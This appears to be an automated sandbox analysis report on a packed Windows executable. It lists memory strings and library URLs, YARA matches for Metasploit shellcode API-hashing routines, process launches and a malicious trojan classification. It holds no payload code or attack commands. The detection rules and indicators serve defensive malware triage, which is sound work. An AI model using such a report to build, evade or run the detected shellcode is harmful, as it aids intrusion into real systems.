        Source: DChOtFdp9T.exe, 00000001.00000002.1876269235.00007FFDFB5F0000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/build/).
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://pypi.org/project/cryptography/
        Source: DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
        Source: DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.ioe
        Source: DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
        Source: DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
        Source: DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B6D000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
        Source: DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
        Source: DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
        Source: DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warningsThe
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
        Source: DChOtFdp9T.exe, 00000000.00000003.1690343606.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/
        Source: DChOtFdp9T.exe, 00000000.00000003.1690343606.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1690343606.00000260D1CE3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000000.00000003.1690447579.00000260D1CE4000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
        Source: DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
        Source: DChOtFdp9T.exe, 00000000.00000003.1696302683.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1876005974.00007FFDFB1E4000.00000002.00000001.01000000.00000014.sdmp, DChOtFdp9T.exe, 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp, libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
        Source: DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
        Source: DChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
        Source: DChOtFdp9T.exe, 00000001.00000002.1876630072.00007FFDFB783000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/
        Source: DChOtFdp9T.exe, 00000001.00000002.1876269235.00007FFDFB5F0000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/)
        Source: unknown. Network traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49733

        System Summary

        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY. Matched rule: Identifies the API address lookup function leverage by metasploit shellcode. Author: unknown
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY. Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY. Matched rule: Identifies the API address lookup function leverage by metasploit shellcode. Author: unknown
        Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY. Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY. Matched rule: Identifies the API address lookup function leverage by metasploit shellcode. Author: unknown
        Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY. Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, type: DROPPED. Matched rule: Identifies the API address lookup function leverage by metasploit shellcode. Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, type: DROPPED. Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2B36501_2_00007FFDFF2B3650
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241C121_2_00007FFDFF241C12
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2AD2D01_2_00007FFDFF2AD2D0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2417F81_2_00007FFDFF2417F8
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2424DC1_2_00007FFDFF2424DC
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2427021_2_00007FFDFF242702
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24117C1_2_00007FFDFF24117C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241B541_2_00007FFDFF241B54
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2BAC801_2_00007FFDFF2BAC80
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24149C1_2_00007FFDFF24149C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241CBC1_2_00007FFDFF241CBC
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241A0F1_2_00007FFDFF241A0F
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2426171_2_00007FFDFF242617
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2416181_2_00007FFDFF241618
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2B88701_2_00007FFDFF2B8870
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241EE21_2_00007FFDFF241EE2
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2789201_2_00007FFDFF278920
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24116D1_2_00007FFDFF24116D
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2487201_2_00007FFDFF248720
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF2416FE1_2_00007FFDFF2416FE
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF241D931_2_00007FFDFF241D93
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007450C01_2_00007FFE007450C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007D20E41_2_00007FFE007D20E4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007418601_2_00007FFE00741860
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0074086C1_2_00007FFE0074086C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007520751_2_00007FFE00752075
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007441C01_2_00007FFE007441C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007452201_2_00007FFE00745220
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00799A281_2_00007FFE00799A28
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0074DA391_2_00007FFE0074DA39
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007429641_2_00007FFE00742964
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007391681_2_00007FFE00739168
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007411901_2_00007FFE00741190
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007502601_2_00007FFE00750260
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00739A701_2_00007FFE00739A70
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007422741_2_00007FFE00742274
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00799C041_2_00007FFE00799C04
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007474381_2_00007FFE00747438
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007433701_2_00007FFE00743370
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0073A3901_2_00007FFE0073A390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007983B41_2_00007FFE007983B4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007454E01_2_00007FFE007454E0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00738CE41_2_00007FFE00738CE4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007BFCF41_2_00007FFE007BFCF4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007485101_2_00007FFE00748510
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00746DD81_2_00007FFE00746DD8
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0073EDE41_2_00007FFE0073EDE4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007B3D6C1_2_00007FFE007B3D6C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0073FF301_2_00007FFE0073FF30
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007456701_2_00007FFE00745670
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00742E801_2_00007FFE00742E80
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007446501_2_00007FFE00744650
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0079A0181_2_00007FFE0079A018
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE007397901_2_00007FFE00739790
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CF93A301_2_00007FFE0CF93A30
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CF933001_2_00007FFE0CF93300
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFB31401_2_00007FFE0CFB3140
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFB38701_2_00007FFE0CFB3870
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFD25401_2_00007FFE0CFD2540
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFD1D301_2_00007FFE0CFD1D30
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFE23E01_2_00007FFE0CFE23E0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFE1FB01_2_00007FFE0CFE1FB0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E1345C01_2_00007FFE0E1345C0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E1348101_2_00007FFE0E134810
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E141FE01_2_00007FFE0E141FE0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E141D701_2_00007FFE0E141D70
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E1435201_2_00007FFE0E143520
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E1429B01_2_00007FFE0E1429B0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E142EB01_2_00007FFE0E142EB0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E1424901_2_00007FFE0E142490
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E1521201_2_00007FFE0E152120
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E151D301_2_00007FFE0E151D30
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E1621E01_2_00007FFE0E1621E0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E161F001_2_00007FFE0E161F00
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Code function: String function: 00007FF6029925F0 appears 100 times
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Code function: String function: 00007FFDFF2BD425 appears 48 times
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Code function: String function: 00007FF602992760 appears 36 times
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Code function: String function: 00007FFDFF2BDB03 appears 45 times
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Code function: String function: 00007FFE00743FA0 appears 53 times
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Code function: String function: 00007FFDFF2BD341 appears 1195 times
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Code function: String function: 00007FFDFF2BD33B appears 43 times
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Code function: String function: 00007FFDFF2BD32F appears 327 times
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Code function: String function: 00007FFDFF241325 appears 474 times
        Source: C:\Users\user\Desktop\DChOtFdp9T.exe, Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4020 -s 1316
        Source: unicodedata.pyd.0.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: _overlapped.pyd.0.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-util-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-console-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-process-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-synch-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-file-l2-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-debug-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-string-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-profile-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-localization-l1-2-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-math-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-time-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-file-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-file-l1-2-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: python3.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-heap-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-handle-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-synch-l1-2-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-crt-string-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: api-ms-win-core-memory-l1-1-0.dll.0.dr, Static PE information: No import functions for PE file found
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000001.00000002.1874893653.000001780BD80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER84.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.evad.winEXE@4/120@0/1
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029929E0 GetLastError,FormatMessageW,MessageBoxW,0_2_00007FF6029929E0
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4020
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402Jump to behavior
        Source: DChOtFdp9T.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: DChOtFdp9T.exeVirustotal: Detection: 63%
        Source: DChOtFdp9T.exeReversingLabs: Detection: 44%
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile read: C:\Users\user\Desktop\DChOtFdp9T.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\DChOtFdp9T.exe "C:\Users\user\Desktop\DChOtFdp9T.exe"
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: C:\Users\user\Desktop\DChOtFdp9T.exe "C:\Users\user\Desktop\DChOtFdp9T.exe"
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4020 -s 1316
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: C:\Users\user\Desktop\DChOtFdp9T.exe "C:\Users\user\Desktop\DChOtFdp9T.exe"Jump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: libffi-8.dllJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeSection loaded: propsys.dllJump to behavior
